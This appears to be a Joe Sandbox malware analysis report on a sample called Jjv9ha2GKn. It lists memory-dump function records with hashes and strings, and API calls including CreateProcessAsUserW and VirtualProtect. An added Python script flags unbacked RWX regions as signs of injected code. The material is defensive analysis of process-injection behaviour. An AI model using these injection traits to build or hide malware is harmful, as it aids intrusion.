• Source File: 00000000.00000002.2751306084.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_26f0000_Jjv9ha2GKn.jbxd
Similarity
• API ID:
• String ID: (o]q$(o]q$(o]q$(o]q$,aq$,aq$Haq
• API String ID: 0-105717579
• Opcode ID: 4f292fdc64d7b444f6a538691724999403c350126b83de6474f1a3ddd3cf03bb
• Instruction ID: 95c8cc0c6c6f4959b0e87d9e9800216c2331d7e826398809a1fb74972e6168d8
• Opcode Fuzzy Hash: 4f292fdc64d7b444f6a538691724999403c350126b83de6474f1a3ddd3cf03bb
• Instruction Fuzzy Hash: 17827D71A002198FCF55DF69C884AAEBBB6FF88304F1485A9E505EB3A5DB34DD42CB50

Control-flow Graph (node graph omitted; legend: Executed / Not Executed)

Strings
Memory Dump Source
• Source File: 00000000.00000002.2761733644.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7190000_Jjv9ha2GKn.jbxd
Similarity
• API ID:
• String ID: @$@
• API String ID: 0-149943524
• Opcode ID: c99e2db1d4cf4fa3656e148da8aa1a2771d17a69e285f7e69735bc1f08c3cca8
• Instruction ID: 46974c70c39b30ac7bac343b2c87bb0379d3a2c670b91be3581143b0ef355e7e
• Opcode Fuzzy Hash: c99e2db1d4cf4fa3656e148da8aa1a2771d17a69e285f7e69735bc1f08c3cca8
• Instruction Fuzzy Hash: 2C538DB0A152688FCB54FF78D98965DBBB1AB85304F8084E9D44CB7380DE386D86CF56

Control-flow Graph (node graph omitted; legend: Executed / Not Executed)

Memory Dump Source
• Source File: 00000000.00000002.2761625176.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7150000_Jjv9ha2GKn.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4d8851a9465da6000ff6fb14e63139fd181eb9c17eff459cdf77d25c5d49e5da
• Instruction ID: 027fa97a6965a6c5bf3222a203f04a9c521c0351d0a11081ce30b7d45d4a9edd
• Opcode Fuzzy Hash: 4d8851a9465da6000ff6fb14e63139fd181eb9c17eff459cdf77d25c5d49e5da
• Instruction Fuzzy Hash: 5FB31570A15718CFCB58EF38D98966CBBB2BB89300F4089E9D449A7394DB385D85CF46

Control-flow Graph (node graph omitted; legend: Executed / Not Executed)

Memory Dump Source
• Source File: 00000000.00000002.2761625176.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7150000_Jjv9ha2GKn.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 77e9b15f239e196f0a5d339c83fe1a365bc52824eab51974bf786aecb5309434
• Instruction ID: b6f5ed4f4f290a3ca99f22a1c43a339177552fb8b0d5e521268f423d20630165
• Opcode Fuzzy Hash: 77e9b15f239e196f0a5d339c83fe1a365bc52824eab51974bf786aecb5309434
• Instruction Fuzzy Hash: 9FB31570A15718CFCB58EF38D98966CBBB2BB89300F4089E9D449A7394DB385D85CF46

Control-flow Graph (node graph omitted; legend: Executed / Not Executed)

Memory Dump Source
• Source File: 00000000.00000002.2762215994.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b30000_Jjv9ha2GKn.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a87dc7c4a15bba82757a5e5dc00fe2e3a763cd5f5b3edb3ca2a6608aa9aa78dd
• Instruction ID: 0ffa25010c2b78ac95fc57e35c0ea1839b71a8b4d7f22ece89eba959174f7fa0
• Opcode Fuzzy Hash: a87dc7c4a15bba82757a5e5dc00fe2e3a763cd5f5b3edb3ca2a6608aa9aa78dd
• Instruction Fuzzy Hash: 39B30870A116198FCB58FF78D98966CBBF2BB88200F4089E9D488A7354DF345D85CF96

Control-flow Graph (node graph omitted; legend: Executed / Not Executed)

Strings
Memory Dump Source
• Source File: 00000000.00000002.2761948083.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_75d0000_Jjv9ha2GKn.jbxd
Similarity
• API ID:
• String ID: e\1$e\1$"*p$"*p
• API String ID: 0-1513742261
• Opcode ID: aa09dfd12ef4b7e92ce3ae531b437f33dc3b54520bdea207bdc1c48d9dbba2df
• Instruction ID: 65637a4ec6253af2afd5342e4b324fe52aadc491c715883812f9a0709a67fa66
• Opcode Fuzzy Hash: aa09dfd12ef4b7e92ce3ae531b437f33dc3b54520bdea207bdc1c48d9dbba2df
• Instruction Fuzzy Hash: A881F1B0D05259CFCB24CFAAD9446EEBBF2BF89300F20952AD416BB254E7355A01CF58

Control-flow Graph (node graph omitted; legend: Executed / Not Executed)

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761733644.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7190000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: G
                                                                                                            • API String ID: 0-985283518
                                                                                                            • Opcode ID: 0d79b53ecd313e71dff3b6c3b86207f085488ad790c13f5d984dde19e87734e8
                                                                                                            • Instruction ID: cdebfb6bd6bc907a0e29f37a8241bce80db181eb904f2ca7132ed2015c950c78
                                                                                                            • Opcode Fuzzy Hash: 0d79b53ecd313e71dff3b6c3b86207f085488ad790c13f5d984dde19e87734e8
                                                                                                            • Instruction Fuzzy Hash: BA436DB0A146688BCB54FF78D98965DBBB1AB88304F8085E9D44DB3340DE386DC6CF56

                                                                                                            Control-flow Graph

Control-flow graph (each node id is followed by its basic-block address range; edges are listed as source->target): 7548 75d3790-75d37aa 7549 75d37ac 7548->7549 7550 75d37b1-75d385c 7548->7550 7549->7550 7560 75d385f 7550->7560 7561 75d3866-75d3882 7560->7561 7562 75d388b-75d388c 7561->7562 7563 75d3884 7561->7563 7565 75d39fb-75d3a01 7562->7565 7563->7560 7563->7562 7564 75d38ad-75d393d 7563->7564 7563->7565 7566 75d39c4-75d39c8 7563->7566 7567 75d3891-75d38ab 7563->7567 7568 75d3970-75d39af 7563->7568 7585 75d393f-75d394e 7564->7585 7586 75d3950-75d3957 7564->7586 7569 75d39db-75d39e2 7566->7569 7570 75d39ca-75d39d9 7566->7570 7567->7561 7582 75d39b7-75d39bf 7568->7582 7573 75d39e9-75d39f6 7569->7573 7570->7573 7573->7561 7582->7561 7587 75d395e-75d396b 7585->7587 7586->7587 7587->7561
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761948083.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_75d0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 6f$6f$$]q
                                                                                                            • API String ID: 0-3010377955
                                                                                                            • Opcode ID: 427c122ad7172a6edc110042838aaa570d877a283e2454b23b65f21420a0ed01
                                                                                                            • Instruction ID: 5a248ad02224648d2511ffaa2796225a821543f3cd5e1e6e3bfe24015a7a3b21
                                                                                                            • Opcode Fuzzy Hash: 427c122ad7172a6edc110042838aaa570d877a283e2454b23b65f21420a0ed01
                                                                                                            • Instruction Fuzzy Hash: 8C71D4B4E01209DFDB54CFA9D5855DEBBB2FF89300F20856AE40AAB354DB345A81CF91
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761733644.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7190000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Te]q$Te]q
                                                                                                            • API String ID: 0-3320153681
                                                                                                            • Opcode ID: 24ec86ec18a05d969e088cab8835882675ddc57c20f57cfbb6e031cfa7cb0990
                                                                                                            • Instruction ID: 84b7fd25640409d7e50f1b1f601b543bbcdc5c6abcc56af5ded0498640756f29
                                                                                                            • Opcode Fuzzy Hash: 24ec86ec18a05d969e088cab8835882675ddc57c20f57cfbb6e031cfa7cb0990
                                                                                                            • Instruction Fuzzy Hash: EAA104B5E152098FCB08CFA9D9906DEFBF2FF89310F24902AD415BB295DB3499468F50
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761733644.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7190000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Te]q$Te]q
                                                                                                            • API String ID: 0-3320153681
                                                                                                            • Opcode ID: b40cf78007ec7d9843ebc01ecb030253f514d81d09871ee97526cdc2e0fabad6
                                                                                                            • Instruction ID: 8cb87ed65c3e8c14ad7ed829a9f91d0179dde97913aaba0dd7088a89d42390ce
                                                                                                            • Opcode Fuzzy Hash: b40cf78007ec7d9843ebc01ecb030253f514d81d09871ee97526cdc2e0fabad6
                                                                                                            • Instruction Fuzzy Hash: CB91C4B4E142098FDB08CFAAD984ADEFBB2FF89300F14942AD415BB254DB349946CF54
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761948083.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_75d0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 6f$$]q
                                                                                                            • API String ID: 0-403443862
                                                                                                            • Opcode ID: a2b4ef290522b567844e3905234b10ac1d6a9693c51e46cb6353e04265816ed7
                                                                                                            • Instruction ID: 781007e88dff8253f80bdfa9269e4bd8b0e4944aab90993512f579258e3c656c
                                                                                                            • Opcode Fuzzy Hash: a2b4ef290522b567844e3905234b10ac1d6a9693c51e46cb6353e04265816ed7
                                                                                                            • Instruction Fuzzy Hash: 1071F4B4E01209DFDB14CFA9D5855DEBBB2FF89300F20856AE406A7355DB345A81CF91
                                                                                                            APIs
                                                                                                            • CreateProcessAsUserW.KERNELBASE(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 075DAE0B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761948083.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_75d0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateProcessUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 2217836671-0
                                                                                                            • Opcode ID: e7c2375719449b84145836e795bd97aa0edd431a30bac2cb30d3ff34d6ad6d72
                                                                                                            • Instruction ID: 15e4060a9e6956f6ec1dbca70292b633a2539e3dd3c8c42ac6f60bbe23885fe9
                                                                                                            • Opcode Fuzzy Hash: e7c2375719449b84145836e795bd97aa0edd431a30bac2cb30d3ff34d6ad6d72
                                                                                                            • Instruction Fuzzy Hash: 3651F6B190022ADFDB25CF59C840BDEBBB5BF48314F0485AAE818B7250DB719E85CF90
                                                                                                            APIs
                                                                                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0719AF13
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761733644.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7190000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ProtectVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 544645111-0
                                                                                                            • Opcode ID: 4c4e2bc4112b91bf17a670ef3acb3000fba7ed24605e6311b6c2a47eb303f7f3
                                                                                                            • Instruction ID: 0df74ed374e8139aac5b4dac10074eeff958972c595ec12e85d9741ac1790936
                                                                                                            • Opcode Fuzzy Hash: 4c4e2bc4112b91bf17a670ef3acb3000fba7ed24605e6311b6c2a47eb303f7f3
                                                                                                            • Instruction Fuzzy Hash: 2E413DB1E042158FEB18DFAAD84079EBBF2AFC9210F04C0AAD40CA7251EB345985CF61
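The two API records above (CreateProcessAsUserW at 075DAE0B and VirtualProtect at 0719AF13) both come from memory dumps that are marked "based on PE: false", i.e. code running from regions that no loaded image backs. Pulling that pattern out of the flat report text is the first triage step a practitioner takes. The following script is an added example, not Joe Sandbox's own tooling: it groups the function records by dump region and flags regions that are unbacked, private and RWX, listing the APIs called from each. The sample input is constructed from the records on this page. The field layout of the .sdmp file name (field 3 = region base, field 4 = page protection, field 6 = allocation type, all hex in VirtualQuery terms) is an assumption inferred from the names, not documented on the page.

```python
import re

# winnt.h values for page protection and memory type (VirtualQuery semantics)
PAGE_EXECUTE_READWRITE = 0x40
MEM_PRIVATE = 0x20000

# Constructed sample: function records copied from this report section.
SAMPLE_REPORT = """\
APIs
• CreateProcessAsUserW.KERNELBASE(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 075DAE0B
Memory Dump Source
• Source File: 00000000.00000002.2761948083.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_75d0000_Jjv9ha2GKn.jbxd
• API ID: CreateProcessUser
• Opcode ID: e7c2375719449b84145836e795bd97aa0edd431a30bac2cb30d3ff34d6ad6d72
• Instruction Fuzzy Hash: 3651F6B190022ADFDB25CF59C840BDEBBB5BF48314F0485AAE818B7250DB719E85CF90
APIs
• VirtualProtect.KERNELBASE(?,?,?,?), ref: 0719AF13
Memory Dump Source
• Source File: 00000000.00000002.2761733644.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
• API ID: ProtectVirtual
• Instruction Fuzzy Hash: 2E413DB1E042158FEB18DFAAD84079EBBF2AFC9210F04C0AAD40CA7251EB345985CF61
Strings
Memory Dump Source
• Source File: 00000000.00000002.2761733644.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
• String ID: kQD
• Instruction Fuzzy Hash: AFC14BB4E1120ADFCB04CFA9D4818AEFBB2FF49301B55C569D451A7295D734EA42CF90
Memory Dump Source
• Source File: 00000000.00000002.2762051972.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
• Instruction Fuzzy Hash: 7B527B70A00305CFCB14DF68C944B99B7B2FF89314F2186A9D5586F3A2DB71A986CF81
"""

SOURCE_RE = re.compile(
    r"Source File:\s*(?P<name>\S+\.sdmp),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)", re.I)
# "• Api.Module(args), ref: address" lines in the APIs block of a record
API_RE = re.compile(
    r"^\W*(?P<api>[A-Za-z0-9_]+)\.(?P<module>[A-Za-z0-9_]+)\((?P<args>[^)]*)\),"
    r"\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
# Last line of every function record in the report
FINAL_RE = re.compile(r"Instruction Fuzzy Hash:")


def parse_dump_name(name):
    """Split an .sdmp file name into its dot-separated fields.

    ASSUMPTION (inferred, not documented on the page): field 0 is the process
    index, field 3 the region base, field 4 the page protection and field 6
    the allocation type, each an 8+ digit hex value as VirtualQuery reports it.
    """
    parts = name[:-len(".sdmp")].split(".")
    if len(parts) != 8:
        raise ValueError(f"unexpected sdmp name layout: {name}")
    return {"proc_idx": int(parts[0], 16), "base": int(parts[3], 16),
            "protect": int(parts[4], 16), "type": int(parts[6], 16)}


def parse_records(text):
    """Group the flat report lines into per-function records."""
    records, apis, source = [], [], None
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            apis.append(m.groupdict())
            continue
        m = SOURCE_RE.search(line)
        if m:
            source = dict(parse_dump_name(m["name"]), offset=int(m["offset"], 16),
                          pe_backed=(m["pe"].lower() == "true"))
            continue
        if FINAL_RE.search(line) and source is not None:
            records.append({"source": source, "apis": apis})
            apis, source = [], None
    return records


def triage(text):
    """Return one entry per dump region with its flags and the APIs called from it."""
    regions = {}
    for rec in parse_records(text):
        src = rec["source"]
        e = regions.setdefault(src["base"], {
            "proc_idx": src["proc_idx"],
            "rwx": src["protect"] == PAGE_EXECUTE_READWRITE,
            "private": src["type"] == MEM_PRIVATE,
            "pe_backed": src["pe_backed"],
            "functions": 0, "apis": set()})
        e["functions"] += 1
        e["apis"].update(a["api"] for a in rec["apis"])
    for e in regions.values():
        # Private RWX memory with no image behind it that still calls into the
        # OS is the footprint of unpacked or injected code, so flag it.
        e["suspicious"] = e["rwx"] and e["private"] and not e["pe_backed"]
    return regions


def flagged_regions(text):
    """Sorted (base, function count, sorted API names) for suspicious regions."""
    return sorted((base, e["functions"], sorted(e["apis"]))
                  for base, e in triage(text).items() if e["suspicious"])


if __name__ == "__main__":
    for base, count, apis in flagged_regions(SAMPLE_REPORT):
        print(f"0x{base:08X}: {count} function(s), APIs: {', '.join(apis) or '-'}")
```

Run over the full report text, the same parser gives one line per unbacked RWX region with the API calls seen inside it; here that is 075D0000 (CreateProcessAsUserW), 07190000 (VirtualProtect) and 07AF0000 (no direct API hits in the records shown). The RWX-and-unbacked test alone is a heuristic, not proof of injection, which is why the output keeps the per-region API list for the analyst to judge.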
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761733644.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7190000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: kQD
                                                                                                            • API String ID: 0-3066535408
                                                                                                            • Opcode ID: 25986cd9ddd9c02412ab9dc350e7a2ba2278260b0a0968b99f43eaa1500457e8
                                                                                                            • Instruction ID: 58fd82007b7eaca5249cfb4812cfb7e205ad177e2e1efd34df814bf33df7e3db
                                                                                                            • Opcode Fuzzy Hash: 25986cd9ddd9c02412ab9dc350e7a2ba2278260b0a0968b99f43eaa1500457e8
                                                                                                            • Instruction Fuzzy Hash: AFC14BB4E1120ADFCB04CFA9D4818AEFBB2FF49301B55C569D451A7295D734EA42CF90
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761733644.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7190000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: kQD
                                                                                                            • API String ID: 0-3066535408
                                                                                                            • Opcode ID: 5f1af6b665d78f5f5e0ca6e08ce3e8f2647cb5daa71e1df5830b1c65cc54d724
                                                                                                            • Instruction ID: cb3ae0693e24d9a41196bd056c69f88d06a002055004eebf6809ae69de617e12
                                                                                                            • Opcode Fuzzy Hash: 5f1af6b665d78f5f5e0ca6e08ce3e8f2647cb5daa71e1df5830b1c65cc54d724
                                                                                                            • Instruction Fuzzy Hash: 3DC115B4E10209DFCB08CFA9D4848AEFBB2FF89301B55C569D415AB254D738EA42CF90
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761733644.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7190000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: >NG
                                                                                                            • API String ID: 0-1926143806
                                                                                                            • Opcode ID: 4b506ba944becb5ecd6773104638f147e7b731a2f19bdf3ded2a80836ecd9c68
                                                                                                            • Instruction ID: f6f3c8d0273d0a3b22b7cc7d7e28785cd528a9f6e92a53576f05aeccf927e144
                                                                                                            • Opcode Fuzzy Hash: 4b506ba944becb5ecd6773104638f147e7b731a2f19bdf3ded2a80836ecd9c68
                                                                                                            • Instruction Fuzzy Hash: 50615AB0E152198FCB08CFA9C8415EEFBF2EF89301F14D16AD459A7295D7349A42CBA4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761733644.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7190000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: fd80033f06ed6726e835ed4f5efd32927c109c357ef75799add6501ec18a5aca
                                                                                                            • Instruction ID: 41c7b8e46cd08cfc28e6614b6faf598ffdac7210022f5df948c329ed98dbea7b
                                                                                                            • Opcode Fuzzy Hash: fd80033f06ed6726e835ed4f5efd32927c109c357ef75799add6501ec18a5aca
                                                                                                            • Instruction Fuzzy Hash: 35C29F70A142289FC754BF78D9847ADBBB2BF88304F8085A9D44DA7384DF385D86CB56
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761733644.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7190000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: <
                                                                                                            • API String ID: 0-4251816714
                                                                                                            • Opcode ID: 1494fb5d6aaee227eabe5d7e13afda9df94c0ff3894bcb1b4a6d79f2253fbbd3
                                                                                                            • Instruction ID: 54be1feb694b7c9d0da8d3032496e29c861e057ab2d9f468be91e194c857c88e
                                                                                                            • Opcode Fuzzy Hash: 1494fb5d6aaee227eabe5d7e13afda9df94c0ff3894bcb1b4a6d79f2253fbbd3
                                                                                                            • Instruction Fuzzy Hash: 9751A7B1E016588FDB59CFAAC9446DDBBF2AFC9301F14C0AAD409AB264DB345A85CF40
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2762051972.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7af0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ea8ebb012cb3b9ccd6449c87f1e740131ac14097d1ba74cfd4a9a44b8f690c33
                                                                                                            • Instruction ID: 9fd9069546a00df9bcd56d94a778e2b5c742a58afcf6e2078006242dc172b23b
                                                                                                            • Opcode Fuzzy Hash: ea8ebb012cb3b9ccd6449c87f1e740131ac14097d1ba74cfd4a9a44b8f690c33
                                                                                                            • Instruction Fuzzy Hash: 7B527B70A00305CFCB14DF68C944B99B7B2FF89314F2186A9D5586F3A2DB71A986CF81
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2762051972.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7af0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 813e69bcb2ea5e272c5cdf1470121ff813d0cba109fd7e2f766b4f54bc6bb151
                                                                                                            • Instruction ID: 7b882fa25139b14f238774df7002532e81ce5eea9812be0ca247e6101b997269
                                                                                                            • Opcode Fuzzy Hash: 813e69bcb2ea5e272c5cdf1470121ff813d0cba109fd7e2f766b4f54bc6bb151
                                                                                                            • Instruction Fuzzy Hash: 8D527B70A00305CFCB14DF68C944B99B7B2FF89314F2586A9D5586F3A2DB71A986CF81
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761948083.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_75d0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 86c77fbe759d183c6ad3484dcc7e7b4a8f162665657f0718bb062c5e95c4b7f0
                                                                                                            • Instruction ID: d9ff9eb1b02a37d9c7eb89471c2913f34c2fdd7518d6646eda7405ec0e9b4574
                                                                                                            • Opcode Fuzzy Hash: 86c77fbe759d183c6ad3484dcc7e7b4a8f162665657f0718bb062c5e95c4b7f0
                                                                                                            • Instruction Fuzzy Hash: E3F12BB4A1566A8FCB64CF69C9447DDBBB6BF88300F1085E6D40EAB254E7349E81CF40
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761948083.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_75d0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e77f1a863cbe524cfdd78dae74213a898b5e2d6e46bf9d741e800f9ef591e9d4
                                                                                                            • Instruction ID: 6510a80bb81c0fc09aa0f6d574dbfc7d42f3e9f6dd631021a9691b147385c539
                                                                                                            • Opcode Fuzzy Hash: e77f1a863cbe524cfdd78dae74213a898b5e2d6e46bf9d741e800f9ef591e9d4
                                                                                                            • Instruction Fuzzy Hash: FE717DB0D11209DFDB24CFA8C8446EEBBB2FF89301F14892AD412A7254E7755A16CF91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761948083.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_75d0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b1bdd4a2a3e1f08d5f6648846c5d0ad9638a9d8df1eb965efc8f33fd0a0fba15
                                                                                                            • Instruction ID: 1624d2ef7784ed4e4ec34abc0fa7fd8dc5124c19ea7e62937f8a03e50a20073a
                                                                                                            • Opcode Fuzzy Hash: b1bdd4a2a3e1f08d5f6648846c5d0ad9638a9d8df1eb965efc8f33fd0a0fba15
                                                                                                            • Instruction Fuzzy Hash: 9261EB72E056598BDB28CF6B9C452D9FBF3EFC9311F14C1AAC44CAA615DB310A868F41
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761948083.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_75d0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 55c957b199d0c0ee66e24b11fc2420b40288fb3bf34cccee7153de73d65064ef
                                                                                                            • Instruction ID: 0fb002d149efde67cffcac02910bf8a7aac3a1593cba3206902def11744d67de
                                                                                                            • Opcode Fuzzy Hash: 55c957b199d0c0ee66e24b11fc2420b40288fb3bf34cccee7153de73d65064ef
                                                                                                            • Instruction Fuzzy Hash: BA6146B0D11219DFDB18CFE8D5456EEBBB1FF49302F10882AD412A7254E7745A16CF91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761948083.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_75d0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e8afbbd2f8d5663b9f42f4c738d46468112543292544854aeb8045fc6a537d40
                                                                                                            • Instruction ID: 31de4924f824169c2db4c80d990dbee4ff81481bef0c6488cb3422c8cb7d2d42
                                                                                                            • Opcode Fuzzy Hash: e8afbbd2f8d5663b9f42f4c738d46468112543292544854aeb8045fc6a537d40
                                                                                                            • Instruction Fuzzy Hash: C9517CB0D11209DFDB14CFA8D4486EEBBB1FF49301F10996AD412A7354EB799A12CF91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761733644.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7190000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
